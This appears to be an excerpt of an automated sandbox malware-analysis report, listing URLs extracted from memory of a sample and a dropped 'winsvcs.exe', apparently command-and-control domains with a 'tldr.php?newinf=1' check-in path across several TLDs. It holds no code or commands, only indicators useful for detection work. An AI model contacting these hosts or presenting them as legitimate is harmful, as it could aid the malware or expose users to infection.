Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.com/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.com/srndndubsbsifurfd.biz5
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.com/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.net/afeifieuuufufufuf.net5
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.net/tldr.php?newinf=1e
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.ru/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.ru/tldr.php?newinf=192
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nnososoosjfeuhueu.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=14k
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.com/tldr.php?newinf=1L
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.in/tldr.php?newinf=1Qh
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.ru/tldr.php?newinf=1f1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://noeuaoenriusfiruu.su/tldr.php?newinf=1Ho
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1B
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.biz/tldr.php?newinf=1Lk2
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.com/tldr.php?ne
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.com/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nousiieiffgogogoo.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://nousiieiffgogogoo.info/
